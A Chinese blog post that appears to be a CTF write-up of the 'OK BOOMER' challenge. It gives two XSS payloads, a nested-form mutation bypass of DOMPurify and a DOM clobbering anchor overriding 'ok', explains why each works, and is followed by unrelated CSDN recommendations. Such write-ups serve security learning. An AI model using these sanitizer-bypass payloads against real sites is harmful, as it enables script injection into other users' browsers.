OK BOOMER

于 2024-08-18 00:10:14 发布
阅读量147 收藏 2
点赞数 1
文章标签: java 前端 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63264424/article/details/141289241
版权

1.题目

<!-- Challenge -->
<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>

2.思路

DOMPurify是一个流行的JavaScript库,用于防止XSS攻击。该库由一个世界著名安全团队cure53维护,原理是利用白名单,将非白名单内的属性和标签全部过滤。

所以思路主体分为两类,要不绕过要不bypass

思路一:绕过,通过嵌套form循环的错误解析

思路二:DOM Clobbering

3、payload

3.1 方案一

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

3.2 方案二

<a id="ok" href="javascript:alert(1)">

需要将题目中的Javascript:换成DOMPurify库中白名单(tel),因为并没有绕过它,所以直接使用Javascript:会被过滤.

 4、思考与总结

1.DOMPurity的绕过,关键点在于它返回的序列化HTML不符合HTML规范,包含了嵌套FORM元素,所以导致浏览器解析出的DOM树是错误的,img标签直接创建在HTML空间中

2.DOM Clobbering的重点,在于对“ok”的覆盖,a标签的toString方法是不继承于父类的,它返回的值是href属性。所以直接href属性中编写执行函数即可,但是由于没有绕过DOMPruity,因此使用的协议需要是在它的白名单内。

匿名好友657
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2.1.3 script标签async
dao-keer
01-13 242
script标签async属性 script标签async属性只对外部引用的脚本起作用,指定该外部脚本立即被下载但是异步执行,如果多个外部引用的脚本都加上了async属性,浏览器是没法保证它们按照书写顺序来执行的,特别是在这些脚本之间有相互依赖的关系时,要慎用这个async属性,以免引起对象未定义的错误 高级程序设计里面有这样一段话: 异步脚本一定会在load事件之前执行,但可能会
perf script 执行时间_牛逼的Linux性能剖析—perf
weixin_39977136的博客
11-23 2875
系统级性能优化通常包括两个阶段:性能剖析(performance profiling)和代码优化。性能剖析的目标是寻找性能瓶颈,查找引发性能问题的原因及热点代码。代码优化的目标是针对具体性能问题而优化代码或编译选项,以改善软件性能。本篇主要讲性能分析常用的工具——perfperf是一款Linux性能分析工具。Linux性能计数器是一个新的基于内核的子系统,它提供一个性能分析框架,比如...
HTML 5 <script> async 属性简单设置代码异步执行
weixin_33939380的博客
02-21 208
HTML5 script标签支持脚本的异步执行async。脚本将会异步运行: &lt;script type="text/javascript" src="demo_async.js" async="async"&gt;&lt;/script&gt; 定义和用法 async 属性规定一旦脚本可用,则会异步执行。 注释:async 属性仅适用于外部脚本(只有在使用 src 属性时)。 注释:有...
perf script 执行时间_技术译文 | 使用 Perf 和火焰图分析软件
weixin_39621975的博客
11-27 353
作者:Agustín翻译:孟维克原文:https://www.percona.com/blog/2019/11/20/profiling-software-using-perf-and-flame-graphs/在这篇博文,我们将探讨如何一起使用 perf 和火焰图。它们用于生成我们选择的软件正在调用的函数的图形。在此我们使用 Percona 分支版本,但是它可以扩展到任何可以进行解析堆栈跟踪的...
perf script 执行时间_Linux 后台执行任务,tmux session 操作指南
weixin_39917090的博客
11-24 140
前言用ssh执行命令,如果遇到网络断,就不能完成执行,因为会直接断。但是我们有时候,又需要在后台一直跑一些任务,不希望它被断。好在万能的Linux,不会让我们失望。我们可以通过tmux来执行session,然后执行命令,这样会在后台执行,而不会被断先确保系统安装了tmux登录ssh之后,先检查下系统有没有装tmux, 如果没有装,用root权限 装一下# debian/ubuntusudo...
x86_energy_perf_policy.rar_energy_perf_bias
09-24
"x86_energy_perf_policy.rar_energy_perf_bias"这个主题聚焦于如何在Linux操作系统调整这种平衡,以实现最佳的能效表现。`energy_perf_bias`是一个内核参数,用于设置处理器在性能和能耗之间的偏好偏置。 `...
labview_high-perf_fpga_v1.1.pdf_high-perf_fpga_labview_
10-03
在“labview_high-perf_fpga_v1.1.pdf_high-perf_fpga_labview_”这个标题,关键词“high-perf FPGA”暗示了内容将聚焦于LabVIEW在高性能FPGA(Field-Programmable Gate Array)设计的应用。FPGA是一种可重构...
net_perf.zip_perf-tool_tool
09-24
在实际使用,用户可能需要解压后找到这个"net_perf"文件,然后在命令行环境运行,输入相应的参数来执行网络性能测试。 使用这样的工具,用户可以进行以下操作: 1. 测试ping(ICMP)延迟:衡量网络数据包从...
perf_plas_J2_perfectplasticity_理想弹塑性_塑性_塑性力学_弹塑性matlab_源码.rar
09-29
本篇将详细解析标题“perf_plas_J2_perfectplasticity_理想弹塑性_塑性_塑性力学_弹塑性matlab_源码.rar”涉及的知识点,并对其的核心代码“perf_plas_J2.m”进行解读。 首先,我们来理解理想弹塑性模型。理想...
perf_plas_J2_perfectplasticity_理想弹塑性_塑性_塑性力学_弹塑性matlab
09-11
在数学表达上,J2流动理论通常被用来描述这一过程,这也是"perf_plas_J2_perfectplasticity_理想弹塑性_塑性_塑性力学_弹塑性matlab"标题提及的"J2"。J2流动理论基于第二张量J2的泛函,它是应变张量的平方模的二分...
关于scriptasync属性
dianchun8914的博客
08-02 200
script标签有一个很不常用的 async 属性,这个属性最早是由FireFox先搞出来的,然后得到了 Chrome 和 Safari 的支持,但是很不幸的是IE不支持该属性。 关于async的介绍可以见这里:http://www.w3.org/TR/html5/scripting-1.html#attr-script-async async 属性我们大致可以这样去理解: ...
script 标签 async 属性
weixin_44479322的博客
08-13 4700
script 标签 async 属性 普通script 文档解析的过程,如果遇到script脚本,就会停止页面的解析进行下载(但是Chrome会做一个优化,如果遇到script脚本,会快速的查看后边有没有需要下载其他资源的,如果有的话,会先下载那些资源,然后再进行下载script所对应的资源,这样能够节省一部分下载的时间 @Update: 2018-08-17)。 资源的下载是在解析过程进行的,虽说script1脚本会很快的加载完毕,但是他前边的script2并没有加载&执行,所以他只能处于一个
html5scriptasync属性
jyb123的专栏
03-30 1515
我兴奋于html5的原因之一是一些久久未能实现的特性现在可以真正运用于实际项目了.如我们使用placeholder效果蛮久了但是那需要javascript来实现.目前firefox和chrome都是实现了script标签async属性.这个新的属性能让我们以一种更简单的方式防止浏览器阻塞,在这之前我们需要用一些javascript小窍门来解决这个问题. async - html代码
asyncscript标签属性
大脑和心脏都要跳动的97
02-22 130
script标签asyncdefer属性
最新发布
qq_54140719的博客
09-22 1940
1、async:表示应该立即开始下载脚本,但不能阻止其他的页面动作,比如下载资源或等待其他脚本加载。只对外部脚本文件有效。 2、defer:表示脚本可以延迟到文档完全被解析和显示之后再执行。只对外部脚本文件有效。(在IE7及更早的版本,在行内脚本也可以指定这个属性)。
script标签asyncdefer属性
Janejie_Zhou的博客
04-03 454
asyncdefer均为script元素的属性 async: 表示立即下载脚本,但不应妨碍页面的其他操作,比如下载资源或等待加载其他脚本。不让页面等待两个脚本下载和执行,从而异步加载页面其他内容。async='async' defer: 表示脚本可以延迟到文档完全被解析和显示之后再执行。延迟脚本,defer='defer'脚本等到之后再执行 相同: 只对外部脚本有效 只要不存在async和de...
`<script>` 标签deferasync 属性
超悠閒的博客
04-01 460
<script> 标签的加载和执行时机 文章目录`简介 在浏览器的运行环下,我们知道要想在网页插入脚本,我们可以使用 <script> 标签来选择引入内联脚本/外部文件脚本的方式来为网页插入 js。但是脚本的加载和执行时机其实是与 HTML 文件的解析紧密关联的,本篇将详细介绍使用 <script> 标签时关于脚本加载的 deferasync 属性之间的区别。 参考 deferasync的区别 https://segmentfault.com
玩转代码|Script 标签asyncdefer属性详细分析
Jum的博客
07-12 1406
Hello 👋🏻 ~
perf script
07-27
您好!您提到了 `perf script`,它是一个用于解析和显示 Linux 性能剖析数据的命令。`perf` 是 Linux 系统提供的一个性能分析工具,它可以用于收集各种系统和应用程序的性能数据。`perf script` 命令可以将 `perf` 命令收集到的二进制数据转换为易于阅读的文本格式,方便进行分析和调试。 使用 `perf script` 命令时,您需要提供一个 `perf.data` 文件,该文件包含了通过 `perf record` 命令收集到的性能数据。`perf script` 命令会解析这个文件,并将结果输出到标准输出或指定的文件。您可以使用一些选项来过滤和格式化输出的结果。 例如,您可以运行以下命令来解析 `perf.data` 文件并输出到标准输出: ``` perf script ``` 您还可以将输出结果重定向到文件,例如: ``` perf script > perf.txt ``` 这样就会将解析后的结果保存到 `perf.txt` 文件。希望这能回答您的问题!如果您还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值